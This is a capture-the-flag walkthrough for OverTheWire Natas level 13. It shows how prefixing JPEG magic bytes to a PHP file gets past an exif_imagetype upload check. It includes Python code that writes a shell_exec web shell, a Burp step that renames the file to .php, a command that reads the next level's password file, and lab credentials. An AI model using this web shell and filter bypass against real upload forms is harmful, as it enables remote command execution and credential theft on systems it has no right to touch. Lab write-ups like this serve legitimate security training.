Level 13 Username : natas13 Password : jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY URL : http://natas13.natas.labs.overthewire.org
To solve this level, we first log into the natas13 application using the credentials provided above.
The application looks very similar to the previous level; this time, however, it validates the uploaded file's type with the exif_imagetype function. According to the PHP manual, exif_imagetype determines the type of an image by reading the first bytes of the file and checking them against known image signatures. It never inspects the rest of the file.
Because the function only looks at the leading bytes, a file that starts with the same ' magic numbers ' the function expects should pass the check regardless of what follows. A quick Wikipedia search yields 0xFF 0xD8 0xFF 0xE0 as the JPEG (JFIF) magic (exif_imagetype itself only compares the first three bytes, 0xFF 0xD8 0xFF, for JPEG). Therefore, we create a new PHP file with these magic numbers at the beginning. I used Python to create the following shell file. Apart from the first four bytes, the rest of the file is exactly the same as before.
>>> shell = open('shell.php', 'wb')
>>> shell.write(b'\xFF\xD8\xFF\xE0' + b'<?php $output = shell_exec($_GET["cmd"]); echo "<pre>$output</pre>"; ?>')
>>> shell.close()
The file is opened in binary mode ('wb') and written as bytes so that the 0xFF and 0xD8 bytes land in the file unchanged; in Python 3 a text-mode write of '\xFF' would be UTF-8 encoded as two bytes and the signature check would fail.
Once again, we upload this PHP file, intercepting the request in Burp and changing the extension in the hidden filename field from .jpg to .php. Navigate to the URL the application reports for the uploaded file and append ' ?cmd=cat%20/etc/natas_webpass/natas14 '; the application prints the password for the next level. The four magic bytes sit outside the <?php tag, so PHP echoes them verbatim at the top of the response ahead of the command output.
Level 14 Username : natas14 Password : Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1 URL : http://natas14.natas.labs.overthewire.org